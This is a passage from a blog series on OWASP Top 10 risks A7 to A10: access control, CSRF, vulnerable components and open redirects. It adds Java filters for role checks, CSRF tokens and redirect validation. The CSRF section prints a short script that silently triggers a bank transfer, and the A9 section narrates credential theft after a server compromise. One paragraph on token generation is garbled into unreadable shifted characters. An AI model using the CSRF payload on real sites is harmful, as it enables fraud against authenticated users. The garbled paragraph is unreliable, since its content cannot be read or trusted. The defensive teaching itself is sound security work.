<sec:session-management invalid-session-url="/login.xhtml" />
</sec:http>
Hide unauthorized functions
If users don't know a function exists, they won't be tempted to use it.
When possible, only show the functions the user can access with his privileges. This way, you won't expose sensitive URLs to potential attackers. Of course, that means you should not have anything in the generated HTML/javascript code related to these hidden functions. Avoid HTML blocks hidden with CSS or javascript…
With your preferred web framework, you will find different mechanisms to display or hide an HTML block depending on the user's privileges.
E.g. Spring Webflow provides <authorize>, a Spring Security tag for JSF:
<security:authorize ifAnyGranted="ROLE_USER,ROLE_MANAGER" ifNotGranted="ROLE_ADMIN">
Links to client functions (also accessible to clerks)
</security:authorize>
<security:authorize ifAllGranted="ROLE_MANAGER" ifNotGranted="ROLE_USER,ROLE_ADMIN">
Links to Management functions (only for clerks)
</security:authorize>
<security:authorize ifAllGranted="ROLE_ADMIN" ifNotGranted="ROLE_USER,ROLE_MANAGER">
Links to Administration functions (only for administrators)
</security:authorize>
Log sensitive actions
Last but not least: log in a secure place all sensitive actions done on your website. If your website is attacked, even if the attack failed (because the mitigations I proposed are all applied on your website), it is still interesting to know how and when you were attacked and by whom. Thus, you can take specific actions against the source of the attack (blocking IP, deactivating account, revoking client certificate…) and investigate further.
An even better option would be to be alerted when a suspicious action is requested. For example, if an authenticated simple user tries to access a management function, of course, the access will be rejected but it may be interesting to know that there was a potential attack attempt.
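An added example (not from the original post) of the centralized, deny-by-default, role-based control described in this article, written as a plain Servlet API Filter over the directory layout shown earlier, with an audit log entry for every rejected request so that attack attempts like the one just described are recorded. Class, logger and role names are this example's own.

```java
import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;
import java.util.logging.Logger;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Added example (not code from the original post): a centralized, role-based,
 * deny-by-default filter for the directory layout shown above, using only the
 * Servlet API. Every rejected request is written to an audit log with the user,
 * the path and the source address, so attack attempts can be investigated.
 */
public class RoleAccessFilter implements Filter {

    private static final Logger AUDIT = Logger.getLogger("audit");

    // Pages anyone may see. Everything not listed here or in RULES is denied.
    private static final Set<String> PUBLIC = new HashSet<String>(
            Arrays.asList("/home.xhtml", "/login.xhtml", "/access_denied.xhtml"));

    // Most specific prefix first: the first matching rule decides.
    private static final Map<String, String[]> RULES = new LinkedHashMap<String, String[]>();
    static {
        RULES.put("/secure/admin/",     new String[] {"ROLE_ADMIN"});
        RULES.put("/secure/mgmt/",      new String[] {"ROLE_MANAGER"});
        RULES.put("/secure/user/",      new String[] {"ROLE_USER", "ROLE_MANAGER"});
        RULES.put("/secure/home.xhtml", new String[] {"ROLE_USER", "ROLE_MANAGER", "ROLE_ADMIN"});
    }

    /** Roles allowed on a path: empty array for public pages, null when nothing is allowed. */
    static String[] allowedRoles(String path) {
        if (PUBLIC.contains(path)) {
            return new String[0];
        }
        for (Map.Entry<String, String[]> rule : RULES.entrySet()) {
            if (path.startsWith(rule.getKey())) {
                return rule.getValue();
            }
        }
        return null; // deny by default
    }

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        String path = req.getRequestURI().substring(req.getContextPath().length());
        String[] roles = allowedRoles(path);

        if (roles != null && roles.length == 0) {      // public page
            chain.doFilter(request, response);
            return;
        }
        if (req.getRemoteUser() == null) {              // not authenticated
            resp.sendRedirect(req.getContextPath() + "/login.xhtml");
            return;
        }
        if (roles != null) {
            for (String role : roles) {
                if (req.isUserInRole(role)) {
                    chain.doFilter(request, response);
                    return;
                }
            }
        }
        // Authenticated user asking for something outside its role: reject and record it.
        AUDIT.warning("ACCESS DENIED user=" + req.getRemoteUser() + " path=" + path
                + " method=" + req.getMethod() + " from=" + req.getRemoteAddr());
        resp.sendRedirect(req.getContextPath() + "/access_denied.xhtml");
    }

    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void destroy() {
    }
}
```

Map the filter to /* in web.xml so that no path is skipped. A ROLE_USER requesting /secure/mgmt/users.xhtml is sent to the access denied page and leaves an "ACCESS DENIED" line in the audit log, which is exactly the alert the text asks for; a path nobody configured, such as /secure/backup/dump.xhtml, is denied as well because no rule matches it.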

OWASP Top 10 – A8 Cross-Site Request Forgery (CSRF)
Description
An attacker sends a request to a website you are authenticated on to execute an operation without your formal approval.
Attackers usually use XSS (http://blog.ippon.fr/2013/10/28/owasp-top-10-a3/) to make you or your browser send this malicious request, but many other flaws exist to achieve the same goal.
Examples
Every month, to pay my rent, I authenticate on my bank's website, then I use the following link saved in my favorites:
https://www.mybank.com/transfer.xhtml?toAccount=FR1234567890&amount=1000&currency=EUR
One day, I find several transfers executed to an account in a foreign country.
An attacker made my browser silently execute these transfers. I was authenticated on my bank's website while browsing other sites. Several pages on the visited sites had the same malicious code:
<script>
x=new Image();
x.src='https://www.mybank.com/transfer.xhtml?toAccount=XY0000000000&amount=100&currency=EUR'
</script>
Each time this code was interpreted by my browser, as long as I was authenticated on my bank's website, I was giving 100 euros to someone I don't even know!
Mitigations
CSRF prevention token
The most effective mitigation against CSRF attacks is to attach a token to each sensitive request. The principle is very simple.
• When the server generates a form, a token is generated, stored on the server side and associated with that generated form on the client side.
• When receiving a request for a protected action,
  ◦ If the token is present and exists on the server side, the action is executed.
  ◦ Otherwise, the request is rejected and the user should be redirected to a landing page. When applicable, the user's session should be invalidated. Of course, an alert should be thrown to administrators and a log should be generated with available information for investigation.
[Image: random_number.png]
,=QDJPNGT, OC@ Q<GP@ JA OC@ B@I@M<O@? OJF@I DN IJO >JIAD?@IOD<G NJ DO HPNO =@ PIKM@?D>O<=G@. &O NCJPG? =@ <
B<N@64-@I>J?@? M<I?JH Q<GP@ (<O G@<NO 32 =TO@N GJIB) JM < 22&!. AQJD? >JPIO@MN, ODH@NO<HKN, NDHKG@ NPDO@N JM
NOMDIBN B@I@M<O@? PNDIB PN@M DIAJMH<ODJI.
1C@ NDHKGD@NO H@OCJ? >JINDON DI B@I@M<ODIB < NDIBG@ OJF@I AJM @<>C <POC@IOD><O@? PN@M (K@M-N@NNDJI KMJO@>ODJI).
&O DN PNP<GGT NOJM@? DI PN@M^N %11- N@NNDJI. 1C@ N<H@ OJF@I DN DIE@>O@? DI <GG AJMHN OC<O HPNO =@ KMJO@>O@? PIODG
PN@M^N N@NNDJI DN DIQ<GD?<O@?. 6JP ><I <GNJ B@I@M<O@ < ?DAA@M@IO OJF@I AJM @<>C N@INDODQ@ K<B@ (K@M-2/& KMJO@>ODJI)
JM @Q@I < OJF@I AJM @<>C N@INDODQ@ M@LP@NO (K@M-M@LP@NO KMJO@>ODJI).
'0# (Q@MNDJI 2.1 <I? <=JQ@) <I? AM<H@RJMFN GDF@ 0/#$P<M? (COOKN://RRR.JR<NK.JMB/DI?@S.KCK/
<O@BJMT:,4A0-;0/#$P<M?;-MJE@>O) KMJQD?@ <POJH<OD> KMJO@>ODJI <B<DINO 0/# <OO<>FN.
6JP ><I <GNJ DHKG@H@IO TJPM JRI KMJO@>ODJI ?@K@I?DIB JI TJPM I@@?N.
• Identify the actions (forms) to protect. You can protect all pages, but you should focus on requests that will modify the state of the application.
• Generate your random value (SecureRandom is recommended) and save it in the new session.
  ◦ For per-request protection, a Java EE Filter can be used to update the token in the session when sending back the response that will display a protected form.
  ◦ For per-session protection, simply implement the sessionCreated method of the HttpSessionListener interface to create your token once.
  ◦ For per-URI protection, you can create all tokens at once using an HttpSessionListener implementation, or create each token on demand, the first time the page to protect is called, using a Filter.
• In the form to protect, add a hidden parameter whose value is the token retrieved from the current session.
• Implement and declare a Java EE Filter, in front of the servlets to protect, to verify that a token is provided in the request and matches the token saved in the user's session. If an attack is suspected, log the available information, then send an alert, invalidate the attacked session…
Note that, for per-session and per-URI protections, you can use a Filter to renew your token after a few usages, after a delay or when an attack is suspected (with per-request protection, token renewal is systematic). And the same Filter can be used to verify the provided token and then update/renew the token for the next request.
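The token workflow described above, implemented as an added example (it is not code from the original post): a Java EE session listener that creates one SecureRandom-based token per session, a helper that emits the hidden form field, and a Filter that checks the token on state-changing requests and, on mismatch, logs the available details, invalidates the session and redirects to a landing page. The class name CsrfProtection, the parameter name _csrf, the landing page /landing.jsp and the use of Java 9+ Set.of are assumptions.

```java
// Added example (not code from the original post): synchronizer-token CSRF protection
// for a Java EE web application, following the steps listed above.
// Assumed: a Servlet 3.0+ container, a landing page at /landing.jsp (hypothetical),
// and that every protected form carries the hidden field named "_csrf" (hypothetical name).
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Set;
import java.util.logging.Logger;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.annotation.WebListener;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.http.HttpSessionEvent;
import javax.servlet.http.HttpSessionListener;

public final class CsrfProtection {
    static final String TOKEN_ATTR = "csrfToken";       // session attribute holding the token
    static final String TOKEN_PARAM = "_csrf";          // hidden form parameter (assumed name)
    static final String LANDING_PAGE = "/landing.jsp";  // assumed landing page
    private static final SecureRandom RNG = new SecureRandom();
    private static final Set<String> STATE_CHANGING = Set.of("POST", "PUT", "DELETE", "PATCH");
    private static final Logger LOG = Logger.getLogger(CsrfProtection.class.getName());

    /** 32 random bytes from SecureRandom, base64url-encoded: unpredictable and safe to embed in HTML. */
    static String newToken() {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    /** Per-session protection: one token created when the HTTP session is created. */
    @WebListener
    public static final class TokenListener implements HttpSessionListener {
        @Override public void sessionCreated(HttpSessionEvent se) {
            se.getSession().setAttribute(TOKEN_ATTR, newToken());
        }
        @Override public void sessionDestroyed(HttpSessionEvent se) { }
    }

    /** The hidden field a protected JSP emits, e.g. <%= CsrfProtection.hiddenField(session) %>. */
    static String hiddenField(HttpSession session) {
        return "<input type=\"hidden\" name=\"" + TOKEN_PARAM + "\" value=\""
                + session.getAttribute(TOKEN_ATTR) + "\">";
    }

    /** Constant-time comparison so the check does not leak how many leading bytes matched. */
    static boolean tokensMatch(String expected, String provided) {
        if (expected == null || provided == null) return false;
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     provided.getBytes(StandardCharsets.UTF_8));
    }

    /** Renewal for per-session/per-URI setups: call after a few usages, a delay or a suspected attack. */
    static void renew(HttpSession session) {
        session.setAttribute(TOKEN_ATTR, newToken());
    }

    /** Verifies the token on every state-changing request before it reaches a servlet. */
    @WebFilter(urlPatterns = "/*")
    public static final class VerifyFilter implements Filter {
        @Override public void init(FilterConfig cfg) { }
        @Override public void destroy() { }

        @Override
        public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
                throws IOException, ServletException {
            HttpServletRequest http = (HttpServletRequest) req;
            HttpServletResponse out = (HttpServletResponse) resp;
            // Reads (GET, HEAD, OPTIONS) carry no token; only requests that modify state are checked.
            if (!STATE_CHANGING.contains(http.getMethod())) {
                chain.doFilter(req, resp);
                return;
            }
            HttpSession session = http.getSession(false);
            String expected = session == null ? null : (String) session.getAttribute(TOKEN_ATTR);
            if (!tokensMatch(expected, http.getParameter(TOKEN_PARAM))) {
                // Suspected CSRF: log what is available for investigation, drop the session,
                // and send the user to the landing page instead of executing the action.
                LOG.warning("CSRF token mismatch: method=" + http.getMethod()
                        + " uri=" + http.getRequestURI() + " remote=" + http.getRemoteAddr()
                        + " referer=" + http.getHeader("Referer"));
                if (session != null) session.invalidate();
                out.sendRedirect(http.getContextPath() + LANDING_PAGE);
                return;
            }
            chain.doFilter(req, resp);
        }
    }
}
```

The listener and the filter are picked up through their annotations (or can be declared in web.xml); each protected JSP inserts the hidden field with hiddenField(session). For the per-request variant, call renew(session) in the filter once the check has passed, so that the next rendered form carries a fresh token.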
Human approval
Again, you have several different methods. I will only focus on the two most used: CAPTCHA and re-authentication.
CAPTCHA (http://en.wikipedia.org/wiki/CAPTCHA) is used to prevent automatic requests sent by robots from being executed. It is an acceptable solution for anonymous actions.
E.g. you can use this protection on your website to prevent account creation requested by robots.
Re-authentication simply consists of asking the authenticated user to enter their credentials again before performing the requested action. Nowadays, all banks (except mybank.com) use this mechanism before a transfer. Of course, with this solution, the user could use a link in their favorites and would have to authenticate before the transfer can be done, unless you also require a CSRF prevention token in the request (recommended).
Note: As I explained in the introduction (http://blog.ippon.fr/2013/10/10/owasp-top-10-introduction/), in the past CSRF was one of the highest risks identified by the OWASP team (rank 5). Then application and framework developers improved the security of their products. Now CSRF attacks are rare, so the risk was recently moved towards the end of the list (rank 8). But stay alert and apply the recommended mitigations… CSRF is still in OWASP's list of risks!
To see all articles related to the OWASP Top 10, follow the tag #owasp (http://blog.ippon.fr/tag/owasp/)
OWASP Top 10 – A9 Using Components with Known Vulnerabilities
Description
Known software vulnerabilities are available to everyone on the Internet. If an attacker knows which components you use, he can retrieve these vulnerabilities and find a way to exploit them.
Examples
Somehow, an attacker found out that my bank's website uses Apache web server version 1.3.22 on Win32. This version has a critical vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061) that allows remote attackers to execute arbitrary commands. As, on Windows, the web server runs with SYSTEM privileges, this vulnerability can be exploited by the attacker to do whatever he wants (steal information, stop services…) on that server.
The attacker first stops the local firewall that blocks outbound connections from the web server to the Internet. Then he can download a network traffic monitoring tool, install it and start it to intercept all traffic behind the Apache web server (after SSL termination). All login requests are intercepted and the relevant information (obviously, login and passcode) is extracted and uploaded to his server using a simple batch script.
Mitigations
The first protection is of course to obfuscate information related to the components (servers, frameworks, operating systems…) you use to run your application. Refer to the previous article about Security Misconfiguration (http://blog.ippon.fr/2013/11/14/owasp-top-10-a5/) for details.
Know your application
To reduce the risk of using vulnerable components, you need to know exactly which components your application uses (directly or not) and the version of each of these components.
If you use Maven to build your application, you should add the Versions Maven plugin (http://mojo.codehaus.org/versions-maven-plugin/) to display the list of dependencies used by your application which have newer versions available. You can even generate an HTML report for your project documentation.
This Maven plugin is just a first step to verify that your application uses the newest versions of its dependent libraries. But obviously, you can't update all the dependencies only because there is a new version available. Updating a dependency's version implies running non-regression tests. And updating libraries can sometimes be very expensive if the API has changed. Besides, the latest version could contain no security fixes and could even introduce new vulnerabilities.
Know your vulnerabilities
As I explained in a previous post (http://blog.ippon.fr/2013/11/14/owasp-top-10-a5/), security patches should be installed as soon as possible. But you also need to know that these patches exist and what they fix, to know whether your application is at risk or not.
OWASP proposes a very interesting free/open-source tool named Dependency Check (https://github.com/jeremylong/DependencyCheck), focused on known vulnerabilities. It is available as a simple Java command line tool, but also as plugins for Ant, Maven or Jenkins.
This tool scans your application to identify third-party libraries (with their versions). Then, for each library, the tool checks whether the identified version has Common Vulnerabilities and Exposures (CVE) entries referenced in the National Vulnerability Database (https://nvd.nist.gov/). With this tool, you will have a clear view of the known vulnerabilities in your application.
Run your own security assessment tests
Even if no known CVE is identified, the combination of different libraries and how you use their APIs could create a vulnerability. Before deploying a new major version of your application to production, consider doing a full static code analysis and a manual code review. Running a penetration test is also recommended for very sensitive applications.
Educate your developers
Developers should not add a new dependency to the application without a strict validation process.
First, before adding a new library, check that no existing dependency can do the same thing.
E.g. on a previous project, a developer who wanted to manipulate a String decided to add Google Guava as a dependency. I have nothing against Guava, but Apache Commons Lang was already a dependency and could do exactly the same thing. Why add a new library (and its own dependencies) only for one method? Your application will be bigger, more difficult to maintain and, more importantly, you could add new vulnerabilities!
If you really need that library, check that it has no known vulnerabilities in the NVD. If vulnerabilities exist, verify that they are fixed in the targeted version.
If you use Maven with a repository manager, you should also apply this validation process to the repository, to reject a library which has known vulnerabilities.
Enable the Java Security Manager
My last recommendation about this topic would be to enable and properly configure the Security Manager according to your needs. It will be your last line of defense to protect your system against some vulnerability exploits in Java libraries.
Of course, it is only for Java applications. It won't protect your web server or your database…
OWASP Top 10 – A10 Unvalidated Redirects and Forwards
Description
If a user is redirected or forwarded to a page defined by an unverified entry, the target URL can be manipulated by an attacker.
This attack is used to redirect a user to a malicious website through a website with a trusted domain name (phishing) or to access an unauthorized internal page.
Examples
My bank provides a very interesting page, “My favorites”, to easily access all available services and manage my own favorites. Thanks to this page, I can retrieve all my favorites from any computer, anywhere in the world.
For example, when I want to consult my emails, I click on the “My mailbox” link I have added to that page. The URL https://www.mybank.com/redirect.jsp?url=www.mymailbox.com is called, then I am redirected to http://www.mymailbox.com/ .
Last time I checked my mailbox, I had received an email from my bank asking me to confirm my login and passcode for security reasons. I clicked on the provided link, entered my login and passcode and that's it!
The problem is that the link I clicked on was https://www.mybank.com/redirect.jsp?url=www.trustme.com and I was silently redirected to http://www.trustme.com/, to a page with the look-and-feel of my bank's website.
A few days later, I received a call from my bank. Someone had used my personal credentials to access my accounts and sent my money abroad.
Mitigations
It is very simple to mitigate this risk: never redirect or forward to unverified URLs or to URLs modifiable with user entry.
An unverified URL is a URL entered by the user and not verified/trusted by the server.
A modifiable URL is a URL with parts (domain name, path, parameters…) that can be modified with unverified/untrusted values entered by the user.
In both cases, the URL can be a full URL (for redirections) or a path to an internal resource (for forwards).
If you really need to redirect a user to another page (external or internal) registered by that user, the page URL must not be in a request parameter. Use an indirect reference instead. Refer to one of my previous posts, about Insecure Direct Object References (http://blog.ippon.fr/2013/11/04/owasp-top-10-a4/), for details on generating an indirect object reference.
E.g. use https://www.mybank.com/redirect.jsp?urlId=abc321 instead of https://www.mybank.com/redirect.jsp?url=www.mymailbox.com , where urlId is an indirect reference to the URL http://www.mymailbox.com added to the user's favorites.
Besides, you can also check that the URL is well-formed and can be trusted before storing it in your database. Some commercial antivirus/firewall products and online services provide blacklists of suspicious websites that can't be trusted.
If the user can choose a landing page after some actions (e.g. their default homepage after login), instead of giving them a blank field to enter what they want, propose a list of acceptable landing pages. This way, the user won't be tempted to enter something like /secure/mgmt/users.xhtml to access user management without authorization! Obviously, if you have applied what I said in my post about Missing Function Level Access Control (http://blog.ippon.fr/2013/12/09/owasp-top-10-a7/), this attempt should not work.
And again, remember that you must avoid direct references. Don't give the real path to the internal resource in the list!
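The indirect-reference and landing-page advice above, as an added example that is not part of the original post: a favorite URL is validated once, at registration time, and stored under an opaque random id that is the only thing ever sent in the urlId parameter; the landing page is picked by key from a fixed map, never from a user-supplied path. The class name FavoriteRedirects, the constructed denylist containing www.trustme.com, the landing-page keys and paths, and the use of Java 9+ Map.of/Set.of are assumptions.

```java
// Added example (not code from the original post): indirect references for user-registered
// favorites plus a fixed list of landing pages, as recommended in the mitigations above.
// Assumed: Java 9+, and that redirect.jsp calls resolve(request.getParameter("urlId")).
import java.net.URI;
import java.net.URISyntaxException;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Locale;
import java.util.Map;
import java.util.Optional;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

public final class FavoriteRedirects {
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");
    // Constructed sample denylist; a real deployment would feed this from a reputation service.
    private static final Set<String> DENYLISTED_HOSTS = Set.of("www.trustme.com");
    // Landing pages the user may pick from: the key travels in the request, never the path.
    private static final Map<String, String> LANDING_PAGES = Map.of(
            "home", "/home.jsp",
            "accounts", "/accounts.jsp",
            "favorites", "/favorites.jsp");
    static final String DEFAULT_LANDING = "/home.jsp";

    // Indirect reference -> validated target (in a real application, stored per user in the database).
    private final Map<String, URI> favorites = new ConcurrentHashMap<>();
    private final SecureRandom rng = new SecureRandom();

    /** Validates the URL once and returns the opaque id to use in redirect.jsp?urlId=... */
    public String register(String rawUrl) {
        URI target = validate(rawUrl)
                .orElseThrow(() -> new IllegalArgumentException("URL rejected"));
        byte[] raw = new byte[12];
        rng.nextBytes(raw);                              // unguessable id, unrelated to the URL
        String id = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        favorites.put(id, target);
        return id;
    }

    /** Only a previously registered id resolves; anything else goes to the default landing page. */
    public String resolve(String urlId) {
        URI target = urlId == null ? null : favorites.get(urlId);
        return target == null ? DEFAULT_LANDING : target.toString();
    }

    /** Well-formed, absolute, http(s), with a host, and not on the denylist. */
    static Optional<URI> validate(String rawUrl) {
        if (rawUrl == null) return Optional.empty();
        URI uri;
        try {
            uri = new URI(rawUrl.trim()).normalize();
        } catch (URISyntaxException e) {
            return Optional.empty();                     // malformed URL
        }
        // "www.mymailbox.com" alone has no scheme and no host: the user must register a full URL.
        if (!uri.isAbsolute() || uri.getHost() == null) return Optional.empty();
        String scheme = uri.getScheme().toLowerCase(Locale.ROOT);
        String host = uri.getHost().toLowerCase(Locale.ROOT);
        if (!ALLOWED_SCHEMES.contains(scheme) || DENYLISTED_HOSTS.contains(host)) {
            return Optional.empty();
        }
        return Optional.of(uri);
    }

    /** Landing page chosen by key from the fixed list; an unknown key falls back to the default. */
    static String landingPage(String key) {
        return key == null ? DEFAULT_LANDING : LANDING_PAGES.getOrDefault(key, DEFAULT_LANDING);
    }

    public static void main(String[] args) {
        FavoriteRedirects r = new FavoriteRedirects();
        String id = r.register("http://www.mymailbox.com/");
        System.out.println("registered id: " + id);
        System.out.println("known id resolves to: " + r.resolve(id));
        System.out.println("unknown id resolves to: " + r.resolve("abc321"));
        System.out.println("scheme-less URL accepted? " + validate("www.mymailbox.com").isPresent());
        System.out.println("denylisted host accepted? " + validate("http://www.trustme.com/").isPresent());
        System.out.println("landing for a raw path: " + landingPage("/secure/mgmt/users.xhtml"));
    }
}
```

Because resolve() looks the id up in a map the server controls, a tampered urlId can only produce the default landing page, and because landingPage() maps keys to paths, the internal path never appears in the request at all.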
To see all articles related to the OWASP Top 10, follow the tag #owasp (http://blog.ippon.fr/tag/owasp/)